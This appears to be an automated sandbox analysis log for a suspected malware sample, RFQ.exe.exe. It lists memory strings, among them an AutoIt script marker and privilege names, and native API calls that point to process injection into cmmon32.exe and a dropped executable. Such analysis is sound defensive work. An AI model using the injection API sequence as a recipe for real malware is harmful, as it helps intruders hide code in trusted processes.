          Source: RFQ.exe.exe, 00000006.00000000.813152196.0000000000E9E000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: RFQ.exe.exe, 00000007.00000000.817261592.0000000000E9E000.00000002.00020000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ.exe.exe, 00000007.00000000.817261592.0000000000E9E000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: RFQ.exe.exe, 00000008.00000002.883444662.0000000000E9E000.00000002.00020000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ.exe.exe, 00000008.00000002.883444662.0000000000E9E000.00000002.00020000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: RFQ.exe.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ.exe.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A360 NtAllocateVirtualMemory,LdrInitializeThunk | 8_2_0153A360
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A3E0 NtFreeVirtualMemory,LdrInitializeThunk | 8_2_0153A3E0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A240 NtReadFile,LdrInitializeThunk | 8_2_0153A240
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A2D0 NtClose,LdrInitializeThunk | 8_2_0153A2D0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A540 NtDelayExecution,LdrInitializeThunk | 8_2_0153A540
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A560 NtQuerySystemInformation,LdrInitializeThunk | 8_2_0153A560
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A5F0 NtReadVirtualMemory,LdrInitializeThunk | 8_2_0153A5F0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A410 NtQueryInformationToken,LdrInitializeThunk | 8_2_0153A410
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A480 NtMapViewOfSection,LdrInitializeThunk | 8_2_0153A480
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A4A0 NtUnmapViewOfSection,LdrInitializeThunk | 8_2_0153A4A0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A750 NtCreateFile,LdrInitializeThunk | 8_2_0153A750
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A700 NtProtectVirtualMemory,LdrInitializeThunk | 8_2_0153A700
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A720 NtResumeThread,LdrInitializeThunk | 8_2_0153A720
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A610 NtAdjustPrivilegesToken,LdrInitializeThunk | 8_2_0153A610
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A6A0 NtCreateSection,LdrInitializeThunk | 8_2_0153A6A0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A800 NtSetValueKey | 8_2_0153A800
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153B0B0 NtGetContextThread | 8_2_0153B0B0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A350 NtQueryValueKey | 8_2_0153A350
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A370 NtQueryInformationProcess | 8_2_0153A370
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A310 NtEnumerateValueKey | 8_2_0153A310
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A3D0 NtCreateKey | 8_2_0153A3D0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A260 NtWriteFile | 8_2_0153A260
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153BA30 NtSetContextThread | 8_2_0153BA30
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A220 NtWaitForSingleObject | 8_2_0153A220
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A2F0 NtQueryInformationFile | 8_2_0153A2F0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153BD40 NtSuspendThread | 8_2_0153BD40
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A520 NtEnumerateKey | 8_2_0153A520
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A5A0 NtWriteVirtualMemory | 8_2_0153A5A0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153B470 NtOpenThread | 8_2_0153B470
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A470 NtSetInformationFile | 8_2_0153A470
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A460 NtOpenProcess | 8_2_0153A460
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153B410 NtOpenProcessToken | 8_2_0153B410
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A430 NtQueryVirtualMemory | 8_2_0153A430
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153ACE0 NtCreateMutant | 8_2_0153ACE0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A710 NtQuerySection | 8_2_0153A710
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A780 NtOpenDirectoryObject | 8_2_0153A780
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A650 NtQueueApcThread | 8_2_0153A650
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0153A6D0 NtCreateProcessEx | 8_2_0153A6D0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_00419830 NtCreateFile | 8_2_00419830
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_004198E0 NtReadFile | 8_2_004198E0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_00419960 NtClose | 8_2_00419960
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_00419A10 NtAllocateVirtualMemory | 8_2_00419A10
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_00419A0B NtAllocateVirtualMemory | 8_2_00419A0B
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA3E0 NtFreeVirtualMemory,LdrInitializeThunk | 29_2_019DA3E0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA360 NtAllocateVirtualMemory,LdrInitializeThunk | 29_2_019DA360
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA2D0 NtClose,LdrInitializeThunk | 29_2_019DA2D0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA240 NtReadFile,LdrInitializeThunk | 29_2_019DA240
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA5F0 NtReadVirtualMemory,LdrInitializeThunk | 29_2_019DA5F0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA540 NtDelayExecution,LdrInitializeThunk | 29_2_019DA540
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA560 NtQuerySystemInformation,LdrInitializeThunk | 29_2_019DA560
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA480 NtMapViewOfSection,LdrInitializeThunk | 29_2_019DA480
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA4A0 NtUnmapViewOfSection,LdrInitializeThunk | 29_2_019DA4A0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA410 NtQueryInformationToken,LdrInitializeThunk | 29_2_019DA410
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA700 NtProtectVirtualMemory,LdrInitializeThunk | 29_2_019DA700
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA720 NtResumeThread,LdrInitializeThunk | 29_2_019DA720
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA750 NtCreateFile,LdrInitializeThunk | 29_2_019DA750
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA6A0 NtCreateSection,LdrInitializeThunk | 29_2_019DA6A0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA610 NtAdjustPrivilegesToken,LdrInitializeThunk | 29_2_019DA610
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DB0B0 NtGetContextThread | 29_2_019DB0B0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA800 NtSetValueKey | 29_2_019DA800
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA3D0 NtCreateKey | 29_2_019DA3D0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA310 NtEnumerateValueKey | 29_2_019DA310
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA350 NtQueryValueKey | 29_2_019DA350
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA370 NtQueryInformationProcess | 29_2_019DA370
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA2F0 NtQueryInformationFile | 29_2_019DA2F0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DBA30 NtSetContextThread | 29_2_019DBA30
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA220 NtWaitForSingleObject | 29_2_019DA220
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA260 NtWriteFile | 29_2_019DA260
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA5A0 NtWriteVirtualMemory | 29_2_019DA5A0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA520 NtEnumerateKey | 29_2_019DA520
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DBD40 NtSuspendThread | 29_2_019DBD40
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DACE0 NtCreateMutant | 29_2_019DACE0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DB410 NtOpenProcessToken | 29_2_019DB410
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA430 NtQueryVirtualMemory | 29_2_019DA430
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DB470 NtOpenThread | 29_2_019DB470
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA470 NtSetInformationFile | 29_2_019DA470
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA460 NtOpenProcess | 29_2_019DA460
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA780 NtOpenDirectoryObject | 29_2_019DA780
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA710 NtQuerySection | 29_2_019DA710
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA6D0 NtCreateProcessEx | 29_2_019DA6D0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_019DA650 NtQueueApcThread | 29_2_019DA650
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_00419830 NtCreateFile | 29_2_00419830
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_004198E0 NtReadFile | 29_2_004198E0
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_00419960 NtClose | 29_2_00419960
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_00419A10 NtAllocateVirtualMemory | 29_2_00419A10
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 29_2_00419A0B NtAllocateVirtualMemory | 29_2_00419A0B
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456ACE0 NtCreateMutant,LdrInitializeThunk | 30_2_0456ACE0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A560 NtQuerySystemInformation,LdrInitializeThunk | 30_2_0456A560
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A610 NtAdjustPrivilegesToken,LdrInitializeThunk | 30_2_0456A610
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A2D0 NtClose,LdrInitializeThunk | 30_2_0456A2D0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A360 NtAllocateVirtualMemory,LdrInitializeThunk | 30_2_0456A360
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A3E0 NtFreeVirtualMemory,LdrInitializeThunk | 30_2_0456A3E0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A470 NtSetInformationFile | 30_2_0456A470
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456B470 NtOpenThread | 30_2_0456B470
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A460 NtOpenProcess | 30_2_0456A460
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A410 NtQueryInformationToken | 30_2_0456A410
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456B410 NtOpenProcessToken | 30_2_0456B410
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A430 NtQueryVirtualMemory | 30_2_0456A430
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A480 NtMapViewOfSection | 30_2_0456A480
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A4A0 NtUnmapViewOfSection | 30_2_0456A4A0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456BD40 NtSuspendThread | 30_2_0456BD40
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A540 NtDelayExecution | 30_2_0456A540
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A520 NtEnumerateKey | 30_2_0456A520
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A5F0 NtReadVirtualMemory | 30_2_0456A5F0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A5A0 NtWriteVirtualMemory | 30_2_0456A5A0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A650 NtQueueApcThread | 30_2_0456A650
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A6D0 NtCreateProcessEx | 30_2_0456A6D0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A6A0 NtCreateSection | 30_2_0456A6A0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A750 NtCreateFile | 30_2_0456A750
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A710 NtQuerySection | 30_2_0456A710
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A700 NtProtectVirtualMemory | 30_2_0456A700
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A720 NtResumeThread | 30_2_0456A720
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A780 NtOpenDirectoryObject | 30_2_0456A780
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A800 NtSetValueKey | 30_2_0456A800
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456B0B0 NtGetContextThread | 30_2_0456B0B0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A240 NtReadFile | 30_2_0456A240
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A260 NtWriteFile | 30_2_0456A260
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456BA30 NtSetContextThread | 30_2_0456BA30
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A220 NtWaitForSingleObject | 30_2_0456A220
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A2F0 NtQueryInformationFile | 30_2_0456A2F0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A350 NtQueryValueKey | 30_2_0456A350
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A370 NtQueryInformationProcess | 30_2_0456A370
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A310 NtEnumerateValueKey | 30_2_0456A310
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_0456A3D0 NtCreateKey | 30_2_0456A3D0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_02569A10 NtAllocateVirtualMemory | 30_2_02569A10
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_02569830 NtCreateFile | 30_2_02569830
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_025698E0 NtReadFile | 30_2_025698E0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_02569960 NtClose | 30_2_02569960
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 30_2_02569A0B NtAllocateVirtualMemory | 30_2_02569A0B
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E36685: CreateFileW,DeviceIoControl,CloseHandle | 6_2_00E36685
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E2ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 6_2_00E2ACC5
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E379D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 6_2_00E379D3
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E2410F | 6_2_00E2410F
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E102A4 | 6_2_00E102A4
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E2038E | 6_2_00E2038E
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00DFE3B0 | 6_2_00DFE3B0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E106D9 | 6_2_00E106D9
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E2467F | 6_2_00E2467F
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E5AACE | 6_2_00E5AACE
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E24BEF | 6_2_00E24BEF
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E1CCC1 | 6_2_00E1CCC1
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00DFAF50 | 6_2_00DFAF50
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00DF6F07 | 6_2_00DF6F07
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E1B043 | 6_2_00E1B043
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E1D1B9 | 6_2_00E1D1B9
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E531BC | 6_2_00E531BC
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E0B11F | 6_2_00E0B11F
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E2724D | 6_2_00E2724D
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E1123A | 6_2_00E1123A
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E03200 | 6_2_00E03200
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E313CA | 6_2_00E313CA
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00DF93F0 | 6_2_00DF93F0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E0F563 | 6_2_00E0F563
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00DF96C0 | 6_2_00DF96C0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E3B6CC | 6_2_00E3B6CC
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E5F7FF | 6_2_00E5F7FF
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00DF77B0 | 6_2_00DF77B0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E279C9 | 6_2_00E279C9
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E0FA57 | 6_2_00E0FA57
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E03B70 | 6_2_00E03B70
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00DF9B60 | 6_2_00DF9B60
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00DF7D19 | 6_2_00DF7D19
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E19ED0 | 6_2_00E19ED0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E0FE6F | 6_2_00E0FE6F
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00DF7FA3 | 6_2_00DF7FA3
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0152594B | 8_2_0152594B
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01527110 | 8_2_01527110
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015B61DF | 8_2_015B61DF
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015C19E2 | 8_2_015C19E2
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01526180 | 8_2_01526180
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015CD9BE | 8_2_015CD9BE
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01521070 | 8_2_01521070
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015BD016 | 8_2_015BD016
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0152E020 | 8_2_0152E020
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01520021 | 8_2_01520021
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015248CB | 8_2_015248CB
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015C28E8 | 8_2_015C28E8
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0150A080 | 8_2_0150A080
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015A18B6 | 8_2_015A18B6
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0151FB40 | 8_2_0151FB40
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015263C2 | 8_2_015263C2
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_014FEBE0 | 8_2_014FEBE0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01524B96 | 8_2_01524B96
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01524A5B | 8_2_01524A5B
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015CE214 | 8_2_015CE214
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015B0A02 | 8_2_015B0A02
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0152523D | 8_2_0152523D
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015C22DD | 8_2_015C22DD
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015C1A99 | 8_2_015C1A99
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015142B0 | 8_2_015142B0
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_014F0D40 | 8_2_014F0D40
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015B1D1B | 8_2_015B1D1B
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015C2519 | 8_2_015C2519
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01511530 | 8_2_01511530
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0159C53F | 8_2_0159C53F
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015AFDDB | 8_2_015AFDDB
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015BD5D2 | 8_2_015BD5D2
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015A1DE3 | 8_2_015A1DE3
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0159E58A | 8_2_0159E58A
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015BE581 | 8_2_015BE581
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0152547E | 8_2_0152547E
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_01511410 | 8_2_01511410
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_0150740C | 8_2_0150740C
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015AF42B | 8_2_015AF42B
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015BDCC5 | 8_2_015BDCC5
          Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 8_2_015B44EF | 8_2_015B44EF
